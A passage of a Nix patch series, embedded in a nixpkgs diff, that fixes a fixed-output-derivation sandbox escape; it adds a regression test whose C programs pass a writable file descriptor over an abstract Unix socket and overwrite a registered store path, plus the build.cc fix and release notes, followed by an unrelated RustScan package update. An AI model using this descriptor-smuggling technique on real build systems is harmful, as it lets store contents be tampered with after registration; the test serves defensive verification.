output. What if we didn't need those -+# processes at all? Unix domain sockets have a semi-known trick: you can pass -+# file descriptors around! -+# This makes it possible to exfiltrate a file-descriptor with write access to -+# $out outside of the sandbox. And that file-descriptor can be used to modify -+# the contents of the store path after it has been registered. -+ -+{ nixpkgs, system, nix }: -+ -+with import (nixpkgs + "/nixos/lib/testing-python.nix") { -+ inherit system; -+}; -+ -+let -+ # Simple C program that sends a a file descriptor to `$out` to a Unix -+ # domain socket. -+ # Compiled statically so that we can easily send it to the VM and use it -+ # inside the build sandbox. -+ sender = pkgs.runCommandWith { -+ name = "sender"; -+ stdenv = pkgs.pkgsStatic.stdenv; -+ } '' -+ $CC -static -o $out ${./sender.c} -+ ''; -+ -+ # Okay, so we have a file descriptor shipped out of the FOD now. But the -+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor -+ # lives in a mount namespace where it is not! So even when this file exists -+ # in the actual Nix store, we're capable of just modifying its contents... -+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); -+ -+ # The abstract socket path used to exfiltrate the file descriptor -+ socketName = "FODSandboxExfiltrationSocket"; -+in -+makeTest { -+ name = "ca-fd-leak"; -+ -+ nodes.machine = -+ { config, lib, pkgs, ... }: -+ { virtualisation.writableStore = true; -+ virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; -+ nix.binaryCaches = [ ]; -+ nix.package = nix; -+ }; -+ -+ testScript = { nodes }: '' -+ start_all() -+ -+ machine.succeed("echo hello") -+ # Start the smuggler server -+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") -+ -+ # Build the smuggled derivation. -+ # This will connect to the smuggler server and send it the file descriptor -+ machine.succeed(r""" -+ nix-build -E ' -+ builtins.derivation { -+ name = "smuggled"; -+ system = builtins.currentSystem; -+ # look ma, no tricks! -+ outputHashMode = "flat"; -+ outputHashAlgo = "sha256"; -+ outputHash = builtins.hashString "sha256" "hello, world\n"; -+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; -+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; -+ }' -+ """.strip()) -+ -+ -+ # Tell the smuggler server that we're done -+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") -+ -+ # Check that the file was modified -+ machine.succeed(r""" -+ cat ./result -+ test "$(cat ./result)" = "hello, world" -+ """.strip()) -+ ''; -+ -+} -diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c -new file mode 100644 -index 000000000..75e54fc8f ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/sender.c -@@ -0,0 +1,65 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <fcntl.h> -+#include <errno.h> -+#include <string.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Set up a abstract domain socket path to connect to. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ -+ // Now try to connect, To ensure we work no matter what order we are -+ // executed in, just busyloop here. -+ int res = -1; -+ while (res < 0) { -+ res = connect(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0 && errno != ECONNREFUSED) perror("connect"); -+ if (errno != ECONNREFUSED) break; -+ } -+ -+ // Write our message header. -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Write an SCM_RIGHTS message containing the output path. -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ hdr->cmsg_len = CMSG_LEN(sizeof(int)); -+ hdr->cmsg_level = SOL_SOCKET; -+ hdr->cmsg_type = SCM_RIGHTS; -+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); -+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); -+ -+ msg.msg_controllen = CMSG_SPACE(sizeof(int)); -+ -+ // Write a single null byte too. -+ msg.msg_iov = malloc(sizeof(struct iovec)); -+ msg.msg_iov[0].iov_base = ""; -+ msg.msg_iov[0].iov_len = 1; -+ msg.msg_iovlen = 1; -+ -+ // Send it to the othher side of this connection. -+ res = sendmsg(sock, &msg, 0); -+ if (res < 0) perror("sendmsg"); -+ int buf; -+ -+ // Wait for the server to close the socket, implying that it has -+ // received the commmand. -+ recv(sock, (void *)&buf, sizeof(int), 0); -+} -diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c -new file mode 100644 -index 000000000..82acf37e6 ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/smuggler.c -@@ -0,0 +1,66 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Bind to the socket. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ int res = bind(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0) perror("bind"); -+ -+ res = listen(sock, 1); -+ if (res < 0) perror("listen"); -+ -+ int smuggling_fd = -1; -+ -+ // Accept the connection a first time to receive the file descriptor. -+ fprintf(stderr, "%s\n", "Waiting for the first connection"); -+ int a = accept(sock, 0, 0); -+ if (a < 0) perror("accept"); -+ -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Receive the file descriptor as sent by the smuggler. -+ recvmsg(a, &msg, 0); -+ -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ while (hdr) { -+ if (hdr->cmsg_level == SOL_SOCKET -+ && hdr->cmsg_type == SCM_RIGHTS) { -+ -+ // Grab the copy of the file descriptor. -+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); -+ } -+ -+ hdr = CMSG_NXTHDR(&msg, hdr); -+ } -+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); -+ close(a); -+ -+ // Wait for a second connection, which will tell us that the build is -+ // done -+ a = accept(sock, 0, 0); -+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); -+ // Write a new content to the file -+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); -+ char * new_content = "Pwned\n"; -+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); -+ if (written_bytes != strlen(new_content)) perror("write"); -+} - -From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <theophane.hufschmitt@tweag.io> -Date: Tue, 13 Feb 2024 08:28:02 +0100 -Subject: [PATCH 2/4] Copy the output of fixed-output derivations before - registering them - -It is possible to exfiltrate a file descriptor out of the build sandbox -of FODs, and use it to modify the store path after it has been -registered. -To avoid that issue, don't register the output of the build, but a copy -of it (that will be free of any leaked file descriptor). ---- - src/libstore/build.cc | 11 +++++++++-- - 1 file changed, 9 insertions(+), 2 deletions(-) - -diff --git a/src/libstore/build.cc b/src/libstore/build.cc -index d3a712c1a..3fb827a15 100644 ---- a/src/libstore/build.cc -+++ b/src/libstore/build.cc -@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs() - throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path); - #endif - -- /* Apply hash rewriting if necessary. */ -+ /* Apply hash rewriting if necessary. -+ * -+ * For FODs, we always do the dump-and-restore dance regardless to make -+ * sure that there's no stale file descriptor pointing to the output -+ * of the path. -+ * */ - bool rewritten = false; -- if (!outputRewrites.empty()) { -+ if (fixedOutput || !outputRewrites.empty()) { -+ if (!outputRewrites.empty()) { - printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path); -+ } - - /* Canonicalise first. This ensures that the path we're - rewriting doesn't contain a hard link to /etc/shadow or - -From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <7226587+thufschmitt@users.noreply.github.com> -Date: Wed, 21 Feb 2024 17:32:36 +0100 -Subject: [PATCH 3/4] Fix a typo in a test comment - -Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> ---- - tests/nixos/ca-fd-leak/default.nix | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -index c252caa4d..2fd5ca2d6 100644 ---- a/tests/nixos/ca-fd-leak/default.nix -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -83,7 +83,7 @@ makeTest { - # Tell the smuggler server that we're done - machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") - -- # Check that the file was modified -+ # Check that the file was not modified - machine.succeed(r""" - cat ./result - test "$(cat ./result)" = "hello, world" - -From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <theophane.hufschmitt@tweag.io> -Date: Fri, 1 Mar 2024 09:31:05 +0100 -Subject: [PATCH 4/4] Add release notes - ---- - doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++ - 1 file changed, 14 insertions(+) - create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md - -diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md -new file mode 100644 -index 000000000..ed451711e ---- /dev/null -+++ b/doc/manual/rl-next/fod-sandbox-escape.md -@@ -0,0 +1,14 @@ -+--- -+synopsis: Fix a FOD sandbox escape -+issues: -+prs: -+--- -+ -+Cooperating Nix derivations could send file descriptors to files in the Nix -+store to each other via Unix domain sockets in the abstract namespace. This -+allowed one derivation to modify the output of the other derivation, after Nix -+has registered the path as "valid" and immutable in the Nix database. -+In particular, this allowed the output of fixed-output derivations to be -+modified from their expected content. -+ -+This isn't the case any more. diff --git a/pkgs/tools/security/rustscan/default.nix b/pkgs/tools/security/rustscan/default.nix index 5189b7c882b73..238fa8fcc5e33 100644 --- a/pkgs/tools/security/rustscan/default.nix +++ b/pkgs/tools/security/rustscan/default.nix @@ -1,37 +1,52 @@ -{ lib, rustPlatform, fetchCrate, nmap, stdenv, Security, perl, python3 }: +{ + lib, + stdenv, + fetchFromGitHub, + nmap, + perl, + python3, + rustPlatform, + Security, +}: rustPlatform.buildRustPackage rec { pname = "rustscan"; - version = "2.1.1"; + version = "2.2.2"; - src = fetchCrate { - inherit pname version; - sha256 = "sha256-yGVhbI1LivTIQEgqOK59T1+8SiTJBPIdftiXkwE4lZM="; + src = fetchFromGitHub { + owner = "RustScan"; + repo = "RustScan"; + rev = "refs/tags/${version}"; + hash = "sha256-67XNEKzR72NOYlPbz2E9yf+THa1XN6muFJG2/iJa8AU="; }; - cargoSha256 = "sha256-UR3ktV80QU0N3f7qmqdhYpc5uwoPq4UvN40zEuMbp+Q="; + cargoHash = "sha256-U9Kn9xAG+emyi8cWUCNP32z7f19MK8AGgGR6vFJd62Q="; postPatch = '' substituteInPlace src/scripts/mod.rs \ - --replace 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap' + --replace-fail 'call_format = "nmap' 'call_format = "${nmap}/bin/nmap' patchShebangs fixtures/.rustscan_scripts/* ''; buildInputs = lib.optional stdenv.isDarwin Security; - nativeCheckInputs = [ perl python3 ]; + nativeCheckInputs = [ + perl + python3 + ]; - # these tests require network access checkFlags = [ + # These tests require network access "--skip=parse_correct_host_addresses" "--skip=parse_hosts_file_and_incorrect_hosts" ]; meta = with lib; { description = "Faster Nmap Scanning with Rust"; - mainProgram = "rustscan"; homepage = "https://github.com/RustScan/RustScan"; + changelog = "https://github.com/RustScan/RustScan/releases/tag/${version}"; license = licenses.gpl3Only; maintainers = with maintainers; [ figsoda ]; + mainProgram = "rustscan"; }; } |